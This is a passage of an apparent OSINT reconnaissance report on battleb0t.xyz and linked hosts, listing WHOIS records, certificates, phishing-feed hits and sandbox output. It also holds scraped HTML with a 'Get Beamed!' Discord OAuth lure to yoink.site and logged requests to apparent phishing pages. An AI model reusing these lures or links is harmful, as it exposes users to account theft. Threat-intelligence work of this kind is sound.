rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /www.google.com/recaptcha/api.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /www.dropbox.com/static/api/2/dropins.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /www.dropbox.com/static/api/2/dropins.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/verizon.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nH | 34.74.170.74 |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:8443 | 188.114.96.0/24 |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.112 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | toyhou.se (Category: hobby)
https://toyhou.se/login | login |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-14n.github.io | 185.199.111.153 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 7 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
| pics.battleb0t.xyz |
| 2023-05-12 02:49:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b8:46:5d:ac:6d:f3:78:e1:a9:4f:74:a7:83:2a:
f1:af:bd:cc:66:b6:b9:bf:84:6f:47:9b:97:1c:a8:
c9:7d:6c:fe:9e:8e:79:9c:a5:37:f9:7d:7a:a0:3b:
dd:dd:59:27:44:ef:fa:f9:9f:ac:5e:a7:96:85:d6:
12:a4:67:16:8a:d5:1c:b5:d1:2d:4e:c7:ec:3d:19:
e5:de:7b:f7:77:77:6b:39:f5:6c:f2:bc:49:15:e4:
d9:26:16:d0:09:ff:d0:9f:cc:e1:2f:72:cd:5d:49:
42:8f:44:ab:2b:64:2c:16:15:0b:c6:a8:c4:87:48:
5c:ca:2c:13:33:5b:9e:8f:26:9e:57:1a:3f:da:51:
8d:e5:86:b3:d8:b8:bb:9b:a8:35:c1:05:df:6d:60:
e8:57:86:af:77:94:58:18:ee:4d:cc:61:8e:ef:d8:
ae:1a:ad:73:4e:d6:21:83:54:e8:94:6d:be:b2:5a:
91:8d:86:36:60:55:a8:6c:ac:42:09:7d:39:a2:a8:
c7:4d:09:67:42:98:43:91:4c:6e:9c:44:89:71:c9:
81:24:98:ab:01:48:f5:7f:9f:03:76:19:5e:40:1f:
e2:a9:ac:0e:74:15:d2:c7:02:a6:94:0f:07:1e:c2:
8f:1c:65:ac:eb:0a:21:1c:42:25:eb:b3:3c:e5:3d:
0f:68:8a:07:35:fd:f2:bf:65:bb:27:0a:28:75:d7:
36:a5:f8:ad:87:2d:4d:e9:8c:44:1c:dd:e0:1f:f8:
19:b0:d2:ba:53:d4:71:e9:68:d3:d7:47:bd:bd:b3:
12:21:a8:7f:36:dd:3a:ee:09:ec:a7:f6:99:fc:9a:
ee:64:c3:e9:cb:48:8b:5b:53:b6:9a:34:49:ed:6f:
97:8c:71:a4:8f:ff:5a:94:b4:2f:23:08:04:1f:5f:
dd:ba:07:c4:98:26:ce:e7:92:3f:eb:aa:ca:85:d1:
9e:9d:66:9d:15:94:f9:a8:c4:87:5f:d8:0f:2a:bd:
f6:c1:3a:15:a4:4a:73:81:4d:25:59:6c:74:3c:88:
be:35:3a:e2:55:b7:aa:f2:6a:84:aa:03:d7:47:36:
8c:65:79:0d:82:62:5e:32:88:98:91:5f:e7:41:ad:
df:3b:04:9a:a4:b7:e8:4a:dc:51:e1:1a:2e:5f:80:
9f:10:99:df:13:16:07:60:53:0f:70:88:4d:8b:bf:
c2:83:ad:7d:95:a6:63:06:b5:f7:e1:fa:b4:f1:f2:
59:97:a4:23:6e:6f:a1:9d:e7:91:3c:8f:96:90:d0:
88:f8:42:7e:b9:a8:0b:95:b2:4a:f1:e1:43:89:bc:
d0:c5:6e:8d:7a:6f:1a:ac:22:35:41:3f:62:4c:b0:
b4:f9:c1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:23.061 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9F:03:F2:57:29:1C:6C:CA:C4:B6:84:
A2:CF:DC:58:71:8F:BE:81:45:60:1F:FF:93:71:3F:A9:
CA:BA:3A:50:C4:02:21:00:90:64:F6:9F:F7:D4:4C:D2:
FE:1C:A7:11:20:05:5D:56:39:91:0A:7B:4C:62:39:AA:
64:BD:6C:3C:C2:FD:A1:0A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:23.103 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:4F:62:25:1A:58:98:9D:A9:66:2A:8C:9C:
A9:99:81:EC:02:DA:B6:46:5C:1C:8A:B1:7D:3E:50:EB:
79:AD:CA:D4:02:21:00:81:0A:60:C2:7A:18:38:E9:6B:
5A:5E:9B:C3:73:2D:B9:E6:6F:7E:07:33:77:3C:F6:0E:
B6:F2:86:95:8C:EA:B2
Signature Algorithm: sha256WithRSAEncryption
0b:32:93:ac:90:bf:47:b0:c4:55:e2:5d:67:21:f0:7b:a7:a4:
cd:66:48:4d:2c:f0:72:c8:d2:e0:06:52:3d:5f:5e:f3:6d:c2:
a4:d3:6b:9f:de:a7:3e:43:94:31:d9:2a:70:b4:d8:61:f6:f9:
5c:2f:4e:93:c9:e9:4f:53:93:2f:86:7b:1f:c9:8a:15:03:28:
96:52:6d:95:ef:a6:c5:d3:5e:db:a3:1b:da:98:f0:b3:d4:33:
b3:0c:25:74:63:ab:88:aa:ca:72:4f:f1:60:47:12:0c:e7:e7:
d2:30:3a:7a:16:b2:67:3a:08:9a:8f:2c:01:80:2f:d2:f1:29:
79:da:43:5d:f1:6e:ce:77:99:33:0f:bd:15:e0:aa:92:a8:51:
21:1e:1f:fc:62:be:58:aa:ad:ce:bf:14:e5:e6:0f:6c:ea:61:
2e:ce:4c:21:48:67:57:3a:f8:75:60:b1:d3:01:c6:eb:1e:96:
48:d4:7d:65:31:de:70:bc:f7:3f:bd:89:d2:15:4c:60:09:1a:
af:c6:86:cb:88:cd:d5:a5:55:42:cd:bd:22:96:61:43:7d:a3:
c6:84:39:52:19:c9:4c:63:fc:ed:7f:7b:3f:3c:68:62:f5:7a:
29:d5:7a:58:55:09:bd:cb:a0:f7:ad:61:48:d5:d6:97:fb:49:
c3:ed:97:11
| battleb0t.xyz |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101dd.github.io]
https://www.openphish.com/feed.txt | 0101dd.github.io |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8001::153 | www.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | P A L M N E T (Net ID: 00:01:71:0A:04:85) | 52.3759, 4.8975 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2087 | 188.114.96.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wireclub (Category: social)
https://www.wireclub.com/users/login | login |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:4D:A9:54) | 40.2024, 29.0398 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Iceland | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CLFPrivate (Net ID: 00:02:6F:B9:C7:0C) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | https://battleb0t.xyz/ | www.battleb0t.xyz |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.83 | 34.74.170.74 |
| 2023-05-12 02:45:40 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco (South Beach)', u'security': {u'is_vpn': False}, u'city_geoname_id': 5326621, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -118.244, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:39'}, u'latitude': 34.0544, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.111.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.111.153 |
| 2023-05-12 02:57:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://optus-equifax.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5488:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5488:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7156:120:WilError_01"\n "Local\\SM0:7156:304:WilStaging_02"\n "Local\\SM0:5488:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5488:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5772:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00005488]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00005488]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5488_1156268761\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005488]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005488]\n "4f160014-68b9-44d4-b7a6-3f79110de750.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4f160014-68b9-44d4-b7a6-3f79110de750.tmp]- [targetUID: 00000000-00005488]\n "8ceb1266-4885-4645-b411-7bc7dd0de9c7.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8ceb1266-4885-4645-b411-7bc7dd0de9c7.tmp]- [targetUID: 00000000-00005488]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00005488]\n "628fc9da-b324-41b9-81c8-5c3463af84f8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\628fc9da-b324-41b9-81c8-5c3463af84f8.tmp]- [targetUID: 00000000-00005488]\n "Part-ZH" has type "data"- Location: [%TEMP%\\5488_430541408\\Part-ZH]- [targetUID: 00000000-00005488]\n "a8e1fd7d-aa4e-4722-b19c-f21bb7f821ad.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a8e1fd7d-aa4e-4722-b19c-f21bb7f821ad.tmp]- [targetUID: 00000000-00005488]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005488]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005488]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00005488]\n "4a885ded-eb9a-4f27-8dc1-8665d4f15f6c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: 